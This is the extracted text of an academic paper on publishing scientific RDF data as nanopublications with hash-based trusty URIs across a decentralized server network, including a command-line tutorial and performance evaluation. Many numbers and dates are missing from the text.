/peerj-cs. the last characters of this uri (i.e., everything after ‘‘ .’’) is what we call the artifact code. it contains a hash value that is calculated on the rdf content it represents, such as the rdf graphs of a nanopublication. because this hash is part of the uri, any link to such an artifact comes with the possibility to verify its content, including other trusty uri links it might contain. in this way, the range of verifiability extends to the entire reference tree. generating these trusty uris does not come for free, in particular because the normalization of the content involves the sorting of the contained rdf statements. for small files such as nanopublications, however, the overhead is minimal, consisting only of about millisecond per created nanopublication when the java library is used (kuhn & dumontier, ; kuhn & dumontier, ). furthermore, we argued in previous work that the assertion of a nanopublication need not be fully formalized, but we can allow for informal or underspecified assertions (kuhn et al., ), to deal with the fact that the creation of accurate semantic representations can be too challenging or too time-consuming for many scenarios and types of users. this is particularly the case for domains that lack ontologies and standardized terminologies with sufficient coverage. these structured but informal statements are supposed to provide a middle ground for the situations where fully formal statements are not feasible. we proposed a controlled natural language (kuhn, ) for these informal statements, which we called aida (standing for the introduced restriction on english sentences to be atomic, independent, declarative, and absolute), and we had shown before that controlled natural language can also serve in the fully formalized case as a user-friendly syntax for representing scientific facts (kuhn et al., ). we also sketched how ‘‘science bots’’ could autonomously produce and publish nanopublications, and how algorithms could thereby be tightly linked to their generated data (kuhn, b), which requires the existence of a reliable and trustworthy publishing system, such as the one we present here. approach our approach on scientific data publishing builds upon the general linked data approach of lifting data on the web to linked rdf representations (berners-lee, ). we only deal here with structured data and assume that is already present in an rdf representation. the question of how to arrive at such a representation from other formats has been addressed by countless approaches—for example sequeda, arenas & miranker ( ) and han et al. ( )—and is therefore outside of the scope of this paper. we furthermore exploit the fact that datasets in rdf can be split into small pieces without any effects on their semantics. after skolemization of blank nodes, rdf triples are independent and can be separated and joined without restrictions. best practices of how to define meaningful small groups of such triples still have to emerge, but an obvious and simple starting point is grouping them by the resource in subject position. we focus here on the technical questions and leave these practical issues for future research. specifically, our approach rests upon the existing concept of nanopublications and our previously introduced method of trusty uris. it is a proposal of a reliable implementation of accepted semantic web principles, in particular of what has become known as the kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure illustration of current architectures of semantic web applications and our proposed approach. follow-your-nose principle: looking up a uri should return relevant data and links to other uris, which allows one (i.e., humans as well as machines) to discover things by navigating through this data space (berners-lee, ). we argue that approaches following this principle can only be reliable and efficient if we have some sort of guarantee that the resolution of any single identifier will succeed within a short time frame in one way or another, and that the processing of the received representation will only take up a small amount of time and resources. this requires that ( ) rdf representations are made available on several distributed servers, so the chance that they all happen to be inaccessible at the same time is negligible, and that ( ) these representations are reasonably small, so that downloading them is a matter of fractions of a second, and so that one has to process only a reasonable amount of data to decide which links to follow. we address the first requirement by proposing a distributed server network and the second one by building upon the concept of nanopublications. below we explain the general architecture, the functioning and the interaction of the nanopublication servers, and the concept of nanopublication indexes. architecture there are currently at least three possible architectures for semantic web applications (and mixtures thereof), as shown in a simplified manner in fig. . the first option is the use of plain http get requests to dereference a uri. applying the follow-your-nose principle, resolvable uris provide the data based on which the application performs the tasks of finding relevant resources, running queries, analyzing and aggregating the results, and using them for the purpose of the application. this approach aligns very well with the principles and the architecture of the web, but the traversal-based querying it entails comes with limitations on efficiency and completeness (hartig, ). if sparql endpoints are used, as a second option, most of the workload is shifted from the application to the server via the expressive power of the sparql query language. as explained above, this puts kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. servers at risk of being overloaded. with a third option such as triple pattern fragments, servers provide only limited query features and clients perform the remainder of the query execution. this leads to reduced server costs, at the expense of longer query times. we can observe that all these current solutions are based on two-layer architectures, and have moreover no inherent replication mechanisms. a single point of failure can cause applications to be unable to complete their tasks: a single uri that does not resolve or a single server that does not respond can break the entire process. we argue here that we need distributed and decentralized services to allow for robust and reliable applications that consume linked data. in principle, this can be achieved for any of these two-layer architectures by simply setting up several identical servers that mirror the same content, but there is no standardized and generally accepted way of how to communicate these mirror servers and how to decide on the client side whether a supposed mirror server is trustworthy. even putting aside these difficulties, two-layer architectures have further conceptual limitations. the most low-level task of providing linked data is essential for all other tasks at higher levels, and therefore needs to be the most stable and robust one. we argue that this can be best achieved if we free this lowest layer from all tasks except the provision and archiving of data entries (nanopublications in our case) and decouple it from the tasks of providing services for finding, querying, or analyzing the data. this makes us advocate a multi-layer architecture, a possible realization of which is shown at the bottom of fig. . below we present a concrete proposal of such a low-level data provision infrastructure in the form of a nanopublication server network. based on such an infrastructure, one can then build different kinds of services operating on a subset of the nanopublications they find in the underlying network. ‘‘core services’’ could involve things like resolving backwards references (i.e., ‘‘which nanopublications refer to the given one?’’) and the retrieval of the nanopublications published by a given person or containing a particular uri. based on such core services for finding nanopublications, one could then provide ‘‘advanced services’’ that allow us to run queries on subsets of the data and ask for aggregated output. these higher layers can of course make use of existing techniques such as sparql endpoints and triple pattern fragments or even classical relational databases, and they can cache large portions of the data from the layers below (as nanopublications are immutable, they are easy to cache). for example, an advanced service could allow users to query the latest versions of several drug-related datasets, by keeping a local triple store and providing users with a sparql interface. such a service would regularly check for new data in the server network on the given topic, and replace outdated nanopublications in its triple store with new ones. a query request to this service, however, would not involve an immediate query to the underlying server network, in the same way that a query to the google search engine does not trigger a new crawl of the web. while the lowest layer would necessarily be accessible to everybody, some of the services on the higher level could be private or limited to a small (possibly paying) user group. we have in particular scientific data in mind, but we think that an architecture of this kind could also be used for semantic web content in general. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure schematic representation of the decentralized server architecture. nanopublications that have trusty uri identifiers can be uploaded to a server (or loaded from the local file system by the server ad- ministrator), and they are then distributed to the other servers of the network. they can then be retrieved from any of the servers, or from multiple servers simultaneously, even if the original server is not accessi- ble. nanopublication servers as a concrete proposal of a low-level data provision layer, as explained above, we present here a decentralized nanopublication server network with a rest api to provide and distribute nanopublications. to ensure the immutability of these nanopublications and to guarantee the reliability of the system, these nanopublications are required to come with trusty uri identifiers, i.e., they have to be transformed on the client side into such trusty nanopublications before they can be published to the network. the nanopublication servers of such a network connect to each other to retrieve and (partly) replicate their nanopublications, and they allow users to upload new nanopublications, which are then automatically distributed through the network. figure shows a schematic depiction of this server network. basing the content of this network on nanopublications with trusty uris has a number of positive consequences for its design: the first benefit is that the fact that nanopublications are always small (by definition) makes it easy to estimate how much time is needed to process an entity (such as validating its hash) and how much space to store it (e.g., as a serialized rdf string in a database). moreover it ensures that these processing times remain mostly in the fraction-of-a-second range, guaranteeing that responses are always quick, and that these entities are never too large to be analyzed in memory. the second benefit is that servers do not have to deal with identifier management, as the nanopublications already come with trusty uris, which are guaranteed to be unique and universal. the third and possibly most important benefit is that nanopublications with trusty uris are immutable and verifiable. this means that servers only have to deal with adding new entries but not with updating them, which eliminates the hard problems of concurrency control and data integrity in distributed systems. (as with classical publications, a nanopublication—once published to the network—cannot be deleted or ‘‘unpublished,’’ but only marked retracted or superseded by the publication of a new nanopublication.) together, these aspects significantly simplify the design of such a network and its synchronization protocol, and make it reliable and efficient even with limited resources. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. specifically, a nanopublication server of the current network has the following components: • a key-value store of its nanopublications (with the artifact code from the trusty uri as the key) • a long list of all stored nanopublications, in the order they were loaded at the given server. we call this list the server’s journal, and it consists of a journal identifier and the sequence of nanopublication identifiers, subdivided into pages of a fixed size. ( , elements is the default: page containing the first , nanopublications; page the next , , etc.) • a cache of gzipped packages containing all nanopublications for a given journal page • pattern definitions in the form of a uri pattern and a hash pattern, which define the surface features of the nanopublications stored on the given server • a list of known peers, i.e., the urls of other nanopublication servers • information about each known peer, including the journal identifier and the total number of nanopublications at the time it was last visited. the server network can be seen as an unstructured peer-to-peer network, where each node can freely decide which other nodes to connect to and which nanopublications to replicate. the uri pattern and the hash pattern of a server define the surface features of the nanopublications that this server cares about. we called them surface features, because they can be determined by only looking at the uri of a nanopublication. for example, the uri pattern ‘ http://rdf.disgenet.org/’ states that the given server is only interested in nanopublications whose uris start with the given sequence of characters. additionally, a server can declare a hash pattern like ‘ aa ab’ to state that it is only interested in nanopublications whose hash in the trusty uri start with one of the specified character sequences (separated by blank spaces). as hashes are represented in base notation, this particular hash pattern would let a server replicate about . % of all nanopublications. nanopublication servers are thereby given the opportunity to declare which subset of nanopublications they replicate, and need to connect only to those other servers whose subsets overlap. to decide on whether a nanopublication belongs to a specified subset or not, the server only has to apply string matching at two given starting points of the nanopublication uri (i.e., the first position and position from the end—as the hashes of the current version of trusty uris are bytes long), which is computationally cheap. based on the components introduced above, the servers respond to the following request (in the form of http get): • each server needs to return general server information, including the journal identifier and the number of stored nanopublications, the server’s uri pattern and hash pattern, whether the server accepts post requests for new nanopublications or servers (see below), and informative entries such as the name and email address of the maintainer and a general description. additionally, some server-specific limits can be specified: the maximum number of triples per nanopublication (the default is , ), the kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. source code repository: https://github. com/tkuhn/nanopub-server. maximum size of a nanopublication (the default is mb), and the maximum number of nanopublications to be stored on the given server (unlimited by default). • given an artifact code (i.e., the final part of a trusty uri) of a nanopublication that is stored by the server, it returns the given nanopublication in a format like trig, trix, n-quads, or json-ld (depending on content negotiation). • a journal page can be requested by page number as a list of trusty uris. • for every journal page (except for incomplete last pages), a gzipped package can be requested containing the respective nanopublications. • the list of known peers can be requested as a list of urls. in addition, a server can optionally support the following two actions (in the form of http post requests): • a server may accept requests to add a given individual nanopublication to its database. • a server may also accept requests to add the url of a new nanopublication server to its peer list. server administrators have the additional possibility to load nanopublications from the local file system, which can be used to publish large amounts of nanopublications, for which individual post requests are not feasible. together, the server components and their possible interactions outlined above allow for efficient decentralized distribution of published nanopublications. specifically, current nanopublication servers follow the following procedure. every server s keeps its own list of known peer ps. for each peer p on that list that has previously been visited, the server additionally keeps the number of nanopublications on that peer server n′p and its journal identifier j′p, as recorded during the last visit. at a regular interval, every peer server p on the list of known peers is visited by server s: . the latest server information is retrieved from p, which includes its list of known peers pp, the number of stored nanopublications np, the journal identifier jp, the server’s uri pattern up, and its hash pattern hp. . all entries in pp that are not yet on the visiting server’s own list of known peers ps are added to ps. . if the visiting server’s url is not in pp, the visiting server s makes itself known to server p with a post request (if this is supported by p). . if the subset defined by the server’s own uri/hash patterns us and hs does not overlap with the subset defined by up and hp, then there won’t be any nanopublications on the peer server that this server is interested in, and we jump to step . . the server will start at position n to look for new nanopublications at server p: n is set to the total number of nanopublications of the last visit n′p, or to if there was no last visit (nanopublication counting starts at ). . if the retrieved journal identifier jp is different from j′p (meaning that the server has been reset since the last visit), n is set to . . if n=np, meaning that there are no new nanopublications since the last visit, the server jumps to step . kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/tkuhn/nanopub-server https://github.com/tkuhn/nanopub-server https://peerj.com http://dx.doi.org/ . /peerj-cs. . all journal pages p starting from the one containing n until the end of the journal are downloaded one by one (considering the size of journal pages, which is by default , nanopublications): (a) all nanopublication identifiers in p (excluding those before n) are checked with respect to whether (a) they are covered by the visiting server’s patterns us and hs and (b) they are not already contained in the local store. a list l is created of all nanopublication identifiers of the given page that satisfy both, (a) and (b). (b) if the number of new nanopublications |l|exceeds a certain threshold (currently set to five), the nanopublications of p are downloaded as a gzipped package. otherwise, the new nanopublications (if any) are requested individually. (c) the retrieved nanopublications that are in list l are validated using their trusty uris, and all valid nanopublications are loaded to the server’s nanopublication store and their identifiers are added to the end of the server’s own journal. (invalid nanopublications are ignored.) . the journal identifier jp and the total number of nanopublications np for server p are remembered for the next visit, replacing the values of j′p and n ′ p. the current implementation is designed to be run on normal web servers alongside with other applications, with economic use of the server’s resources in terms of memory and processing time. in order to avoid overload of the server or the network connection, we restrict outgoing connections to other servers to one at a time. of course, sufficient storage space is needed to save the nanopublications (for which we currently use mongodb), but storage space is typically much easier and cheaper to scale up than memory or processing capacities. the current system and its protocol are not set in stone but, if successful, will have to evolve in the future—in particular with respect to network topology and partial replication—to accommodate a network of possibly thousands of servers and billions of nanopublications. nanopublication indexes to make the infrastructure described above practically useful, we have to introduce the concept of indexes. one of the core ideas behind nanopublications is that each of them is a tiny atomic piece of data. this implies that analyses will mostly involve more than just one nanopublication and typically a large number of them. similarly, most processes will generate more than just one nanopublication, possibly thousands or even millions of them. therefore, we need to be able to group nanopublications and to identify and use large collections of them. given the versatility of the nanopublication standard, it seems straightforward to represent such collections as nanopublications themselves. however, if we let such ‘‘col- lection nanopublications’’ contain other nanopublications, then the former would become very large for large collections and would quickly lose their property of being nano. we can solve part of that problem by applying a principle that we can call reference instead of containment: nanopublications cannot contain but only refer to other nanopublications, and trusty uris allow us to make these reference links almost as strong as containment links. to emphasize this principle, we call them indexes and not collections. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure schematic example of nanopublication indexes, which are themselves nanopublications. nanopublications can (but need not) be elements of one or more indexes. an index can have sub-indexes and can append to another index, in either case acquiring all nanopublications. however, even by only containing references and not the complete nanopublications, these indexes can still become quite large. to ensure that all such index nanopublications remain nano in size, we need to put some limit on the number of references, and to support sets of arbitrary size, we can allow indexes to be appended by other indexes. we set , nanopublication references as the upper limit any single index can directly contain. this limit is admittedly arbitrary, but it seems to be a reasonable compromise between ensuring that nanopublications remain small on the one hand and limiting the number of nanopublications needed to define large indexes on the other. a set of , nanopublications, for example, can therefore be defined by a sequence of indexes, where the first one stands for the first , nanopublications, the second one appends to the first and adds another , nanopublications (thereby representing , of them), and so on up to the last index, which appends to the second to last and thereby stands for the entire set. in addition, to allow datasets to be organized in hierarchies, we define that the references of an index can also point to sub-indexes. in this way we end up with three types of relations: an index can append to another index, it can contain other indexes as sub-indexes, and it can contain nanopublications as elements. these relations defining the structure of nanopublication indexes are shown schematically in fig. . index (a) in the shown example contains five nanopublications, three of them via sub-index (c). the latter is also part of index (b), which additionally contains eight nanopublications via sub-index (f). two of these eight nanopublications belong directly to (f), whereas the remaining six come from appending to index (e). index (e) in turn gets half of its nanopublications by appending to index (d). we see that some nanopublications may not be referenced by any index at all, while others may belong to several indexes at the same time. the maximum number of direct nanopublications (or sub-indexes) is here set to three for illustration purposes, whereas in reality this limit is set to , . in addition to describing sets of data entries, nanopublication indexes can also have additional metadata attached, such as labels, descriptions, further references, and other types of relations at the level of an entire dataset. below we show how this general concept of kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. indexes can be used to define sets of new or existing nanopublications, and how such index nanopublications can be generated and published, and their nanopublications retrieved. as a side note, dataset metadata can be captured and announced as nanopublications even for datasets that are not (yet) themselves available in the nanopublication format. the hcls community profile of dataset descriptions (gray et al., ) provides a good guideline of which of the existing rdf vocabularies to use for such metadata descriptions. trusty publishing let us consider two simple exemplary scenarios to illustrate and motivate the general concepts. to demonstrate the procedure and the general interface of our implementation, we show here the individual steps on the command line in a tutorial-like fashion, using the np command from the nanopub-java library (kuhn, a). of course, users should eventually be supported by graphical interfaces, but command line tools are a good starting point for developers to build such tools. to make this example completely reproducible, these are the commands to download and compile the needed code from a bash shell (requiring git and maven): $ git clone https://github.com/nanopublication/nanopub-java.git $ cd nanopub-java $ mvn package and for convenience reasons, we can add the bin directory to the path variable: $ path=$(pwd)/bin:$path to publish some new data, they have to be formatted as nanopublications. we use the trig format here and define the following rdf prefixes: @prefix : <http://example.org/np #>. @prefix xsd: <http://www.w .org/ /xmlschema#>. @prefix dc: <http://purl.org/dc/terms/>. @prefix pav: <http://purl.org/pav/>. @prefix prov: <http://www.w .org/ns/prov#>. @prefix np: <http://www.nanopub.org/nschema#>. @prefix ex: <http://example.org/>. a nanopublication consists of three graphs plus the head graph. the latter defines the structure of the nanopublication by linking to the other graphs: :head { : a np:nanopublication; np:hasassertion :assertion; np:hasprovenance :provenance; np:haspublicationinfo :pubinfo. } the actual claim or hypothesis of the nanopublication goes into the assertion graph: :assertion { ex:mosquito ex:transmits ex:malaria. } the provenance and publication info graph provide meta-information about the assertion and the entire nanopublication, respectively: kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. :provenance { :assertion prov:wasderivedfrom ex:mypublication. } :pubinfo { : pav:createdby <http://orcid.org/ - - - >. : dc:created " - - t : : + : "^^xsd:datetime. } the lines above constitute a very simple but complete nanopublication. to make this example a bit more interesting, let us define two more nanopublications that have different assertions but are otherwise identical: @prefix : <http://example.org/np #>. ... ex:gene ex:isrelatedto ex:malaria. ... @prefix : <http://example.org/np #>. ... ex:gene ex:isrelatedto ex:malaria. ... we save these nanopublications in a file nanopubs.trig, and before we can publish them, we have to assign them trusty uris: $ np mktrusty -v nanopubs.trig nanopub uri: http://example.org/np #raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i nanopub uri: http://example.org/np #rat swlslymbud kzjsyhvv om wrhlurxmrvpkzcduq nanopub uri: http://example.org/np #rakvupysi ql itlc -iijmg yst -pi dajxcmafu s this gives us the file trusty.nanopubs.trig, which contains transformed versions of the three nanopublications that now have trusty uris as identifiers, as shown by the output lines above. looking into the file we can verify that nothing has changed with respect to the content, and now we are ready to publish them: $ np publish trusty.nanopubs.trig nanopubs published at http://np.inn.ac/ for each of these nanopublications, we can check their publication status with the following command (referring to the nanopublication by its uri or just its artifact code): $ np status -a raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i url: http://np.inn.ac/raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i found on nanopub server. this is what you see immediately after publication. only one server knows about the new nanopublication. some minutes later, however, the same command leads to something like this: $ np status -a raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i url: http://np.inn.ac/raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i url: http://ristretto.med.yale.edu: /nanopub-server/raqozlp lhivtyqhcospbu... url: http://nanopubs.stanford.edu/nanopub-server/raqozlp lhivtyqhcospbutx yeg... url: http://nanopubs.semanticscience.org: /raqozlp lhivtyqhcospbutx yegs y... url: http://rdf.disgenet.org/nanopub-server/raqozlp lhivtyqhcospbutx yegs y a... url: http://app.tkuhn.eculture.labs.vu.nl/nanopub-server- /raqozlp lhivtyqhco... url: http://nanopubs.restdesc.org/raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i url: http://nanopub.backend .scify.org/nanopub-server/raqozlp lhivtyqhcospbut... url: http://nanopub.exynize.com/raqozlp lhivtyqhcospbutx yegs y afqcjmnelq i found on nanopub servers. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. next, we can make an index pointing to these three nanopublications: $ np mkindex -o index.nanopubs.trig trusty.nanopubs.trig index uri: http://np.inn.ac/raxsxuhy idbfddy sm hrfpr eawyxrlssqqaz le this creates a local file index.nanopubs.trig containing the index, identified by the uri shown above. as this index is itself a nanopublication, we can publish it in the same way: $ np publish index.nanopubs.trig nanopub published at http://np.inn.ac/ once published, we can check the status of this index and its contained nanopublications: $ np status -r raxsxuhy idbfddy sm hrfpr eawyxrlssqqaz le index nanopub; content nanopubs again, after just a few minutes this nanopublication will be distributed in the network and available on multiple servers. from this point on, everybody can conveniently and reliably retrieve the given set of nanopublications. the only thing one needs to know is the artifact code of the trusty uri of the index: $ np get -c raxsxuhy idbfddy sm hrfpr eawyxrlssqqaz le this command downloads the nanopublications of the index we just created and published. as another exemplary scenario, let us imagine a researcher in the biomedical domain who is interested in the protein cdkn a and who has derived some conclusion based on the data found in existing nanopublications. specifically, let us suppose this researcher analyzed the five nanopublications specified by the following artifact codes (they can be viewed online by appending the artifact code to the url http://np.inn.ac/ or the url of any other nanopublication server): raeoxlty pejybzwa fubj ogsqujobfitofmbumkbjh raomw xmemwkejcnwlft cgrmg_tgjfvssh hgfemcz ra bh_gncwek_uxfgtvhcmvz hw eupaccddho tiow ra hvj no md d m u-oc bpxlxiwyn l wvb jnttxk rasx-fnzwjzluqrde gvmwfeywlok s ntnkyelwapwno these nanopublications about the same protein come from two different sources: the first one is from the bel nanopub dataset, whereas the remaining four are from nextprot. (see https://github.com/tkuhn/bel nanopub and http://nextprot rdf.sourceforge.net, respectively, and table .) these nanopublications can be downloaded as above with the np get command and stored in a file, which we name here cdkn a-nanopubs.trig. in order to be able to refer to such a collection of nanopublications with a single identifier, a new index is needed that contains just these five nanopublications. this time we give the index a title (which is optional). $ np mkindex -t "data about cdkn a from bel nanopub & nextprot" \ -o index.cdkn a-nanopubs.trig cdkn a-nanopubs.trig index uri: http://np.inn.ac/ra jrrpl nxxfwlo hfwas ufp odzzs_xkwqdxpjg cy the generated index is stored in the file index.cdkn a-nanopubs.trig, and our exemplary researcher can now publish this index to let others know about it: $ np publish index.cdkn a-nanopubs.trig nanopub published at http://np.inn.ac/ kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/tkuhn/bel nanopub http://nextprot rdf.sourceforge.net http://dx.doi.org/ . /peerj-cs. table existing datasets in the nanopublication format, five of which were used for the first part of the evaluation. dataset # nanopublications # triples used for evaluation part name and citation index content index content generif/aida , , , , first (np index ray_lqruua, ) openbel . , , , , first (np index racy i f_w, ) openbel , , , , first (np index rar dwelyl, ) disgenet v . . . , , , , first (np index raxy hxq, ) disgenet v . . . , , , , , , , none (np index ravekrw m , ) nextprot , , , , , , , first (np index raxflg ym, ) liddi , , , , third (np index ra suq e , ) total , , , , , , , there is no need to publish the five nanopublications this index is referring to, because they are already public (this is how we got them in the first place). the index uri can now be used to refer to this new collection of existing nanopublications in an unambiguous and reliable manner. this uri can be included in the scientific publication that explains the new finding, for example with a reference like the following: [ ] data about cdkn a from bel nanopub & nextprot. nanopublication index http://np.inn.ac/ra jrrpl nxxfwlo hfwas ufp odzzs_xkwqdxpjg cy, april . in this case with just five nanopublications, one might as well refer to them individually, but this is obviously not an option for cases where we have hundreds or thousands of them. the given web link allows everybody to retrieve the respective nanopublications via the server np.inn.ac. the url will not resolve should the server be temporarily or permanently down, but because it is a trusty uri we can retrieve the nanopublications from any other server of the network following a well-defined protocol (basically just extracting the artifact code, i.e., the last characters, and appending it to the url of another nanopublication server). this reference is therefore much more reliable and more robust than links to other types of data repositories. in fact, we refer to the datasets we use in this publication for evaluation purposes, as described below in ‘evaluation’, in exactly this way (np index ray_lqruua, ; np index racy i f_w, ; np index rar dwelyl, ; np index raxy hxq, ; np index ravekrw m , ; np index raxflg ym, ; np index ra suq e , ). kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://np.inn.ac/ra jrrpl nxxfwlo hfwas ufp odzzs_xkwqdxpjg cy http://dx.doi.org/ . /peerj-cs. figure the web interface of the nanopublication validator can load nanopublications by their trusty uri (or just their artifact code) from the nanopublication server network. it also allows users to directly publish uploaded nanopublications. the new finding that was deduced from the given five nanopublications can, of course, also be published as a nanopublication, with a reference to the given index uri in the provenance part: @prefix : <http://example.org/myfinding#>. ... @prefix nps: <http://np.inn.ac/>. @prefix uniprot: <http://purl.uniprot.org/uniprot/>. ... :assertion { uniprot:p a ex:proteinwithpropertyx. } :provenance { :assertion prov:wasinfluencedby nps:ra jrrpl nxxfwlo hfwas ufp odzzs_xkwqdxpjg cy. } :pubinfo { : pav:createdby <http://orcid.org/ - - - >. : dc:created " - - t : : + : "^^xsd:datetime. } we can again transform it to a trusty nanopublication , and then publish it as above. some of the features of the presented command-line interface are made available through a web interface for dealing with nanopublications that is shown in fig. . the supported features include the generation of trusty uris, as well as the publication and retrieval of nanopublications. the interface allows us to retrieve, for example, the nanopublication we just generated and published above, even though we used an example.org uri, which is not directly resolvable. unless it is just about toy examples, we should of course try to use kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure this screenshot of the nanopublication monitor interface (http://npmonitor.inn.ac ) showing the current server network. it currently consists of server instances on physical servers in zurich, new haven, ottawa, amsterdam, stanford, barcelona, ghent, athens, leipzig, and haverford. resolvable uris, but with our decentralized network we can retrieve the data even if the original link is no longer functioning or temporarily broken. evaluation to evaluate our approach, we want to find out whether a small server network run on normal web servers, without dedicated infrastructure, is able to handle the amount of nanopublications we can expect to become publicly available in the next few years. our evaluation consists of three parts focusing on the different aspects of dataset publication, server performance, and dataset retrieval, respectively. at the time the first part of the evaluation was performed, the server network consisted of three servers in zurich, new haven, and ottawa. seven new sites in amsterdam, stanford, barcelona, ghent, athens, leipzig, and haverford have joined the network since. the current network of server instances on sites (in countries) is shown in fig. , which is a screenshot of a nanopublication monitor that we have implemented (https://github.com/tkuhn/nanopub- monitor). such monitors regularly check the nanopublication server network, register changes (currently once per minute), and test the response times and the correct operation of the servers by requesting a random nanopublication and verifying the returned data. kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://npmonitor.inn.ac https://github.com/tkuhn/nanopub-monitor https://github.com/tkuhn/nanopub-monitor http://dx.doi.org/ . /peerj-cs. the files of the presented studies are available online in two repositories, one for the analyses of the original studies that have been previously published (https://bitbucket.org/ tkuhn/trustypublishing-study/) and another one with the files for the additional analyses and diagrams for this extended article (https://bitbucket.org/tkuhn/trustypublishingx- study/). evaluation design table shows seven existing large nanopublication datasets. five of these datasets were used for the first part of the evaluation (the other two were not yet available at the time this part of the evaluation was conducted), which tested the ability of the network to store and distribute new datasets. these five datasets consist of a total of more than million nanopublications and close to million rdf triples, including nanopublication indexes that we generated for each dataset. the total size of these five datasets when stored as uncompressed trig files amounts to . gb. each of the datasets is assigned to one of the three servers, where it is loaded from the local file systems. the first nanopublications start spreading to the other servers, while others are still being loaded from the file system. we therefore test the reliability and capacity of the network under constant streams of new nanopublications coming from different servers, and we use two nanopublication monitors (in zurich and ottawa) to evaluate the responsiveness of the network. in the second part of the evaluation we expose a server to heavy load from clients to test its retrieval capacity. for this we use a service called load impact (https://loadimpact.com) to let up to clients access a nanopublication server in parallel. we test the server in zurich over a time of five minutes under the load from a linearly increasing number of clients (from to ) located in dublin. these clients are programmed to request a randomly chosen journal page, then to go though the entries of that page one by one, requesting the respective nanopublication with a probability of %, and starting over again with a different page. as a comparison, we run a second session, for which we load the same data into a virtuoso sparql endpoint on the same server in zurich (with gb of memory given to virtuoso and two . ghz intel xeon processors). then, we perform exactly the same stress test on the sparql endpoint, requesting the nanopublications in the form of sparql queries instead of requests to the nanopublication server interface. this comparison is admittedly not a fair one, as sparql endpoints are much more powerful and are not tailor-made for the retrieval of nanopublications, but they provide nevertheless a valuable and well-established reference point to evaluate the performance of our system. while the second part of the evaluation focuses on the server perspective, the third part considers the client side. in this last part, we want to test whether the retrieval of an entire dataset in a parallel fashion from the different servers of the network is indeed efficient and reliable. we decided to use a medium-sized dataset and chose liddi (np index ra suq e , ), which consists of around , triples. we tested the retrieval of this dataset from a computer connected to the internet via a basic plan from a regular internet service provider (i.e., not via a fast university network) with a command like the following: $ np get -c -o nanopubs.trig ra suq e ljdkpt eos dkykf ht lfmnaztfsdmrxg kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishing-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ https://bitbucket.org/tkuhn/trustypublishingx-study/ https://loadimpact.com http://dx.doi.org/ . /peerj-cs. figure this diagram shows the rate at which nanopublications are loaded at their first, second, and third server, respectively, over the time of the evaluation. at the first server, nanopublications are loaded from the local file system, whereas at the second and third server they are retrieved via the server network. in addition, we wanted to test the retrieval in a situation where the internet connection and/or the nanopublication servers are highly unreliable. for that, we implemented a version of an input stream that introduces errors to simulate such unreliable connections or servers. with a given probability (set to % for this evaluation), each read attempt to the input stream (a single read attempt typically asking for about bytes) either leads to a randomly changed byte or to an exception being thrown after a delay of s (both having an equal chance of occurring of . %). this behavior can be achieved with the following command, which is obviously only useful for testing purposes: $ np get -c -o nanopubs.trig --simulate-unreliable-connection \ ra suq e ljdkpt eos dkykf ht lfmnaztfsdmrxg for the present study, we run each of these two commands times. to evaluate the result, we can investigate whether the downloaded sets of nanopublications are equivalent, i.e., lead to identical files when normalized (such as transformed to a sorted n-quads representation). furthermore, we can look into the amount of time this retrieval operation takes, and the number of times the retrieval of a single nanopublication from a server fails and has to be repeated. evaluation results the first part of the evaluation lasted h and min, at which point all nanopublications were replicated on all three servers, and therefore the nanopublication traffic came to an end. figure shows the rate at which the nanopublications were loaded at their first, second, and third server, respectively. the network was able to handle an average of about , new nanopublications per hour, which corresponds to more than new nanopublications per second. this includes the time needed for loading each nanopublication once from the local file system (at the first server), transferring it through the network two times (to the other two servers), and for verifying it three times (once when loaded and twice when received by the other two servers). figure shows the response times of the three servers as measured by the two nanopublication monitors in zurich (top) and ottawa (bottom) kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure server response times under heavy load, recorded by the monitors during the first evalua- tion. time from start of test in seconds re sp o n se t im e in s e co n d s . number of clients accessing the service in parallel virtuoso triple store with sparql endpoint nanopublication server figure results of the evaluation of the retrieval capacity of a nanopublication server as compared to a general sparql endpoint (note the logarithmic y-axis). during the time of the evaluation. we see that the observed latency is mostly due to the geographical distance between the servers and the monitors. the response time was always less than . s when the server was on the same continent as the measuring monitor. in . % of all cases (including those across continents) the response time was below . s, and it was always below . s. not a single one of the , individual http requests timed out, led to an error, or received a nanopublication that could not be successfully verified. figure shows the result of the second part of the evaluation. the nanopublication server was able to handle , requests in total (i.e., an average of requests per second) with an average response time of . s. in contrast, the sparql endpoint answering the same kind of requests needed times longer to process them ( s on average), kuhn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com 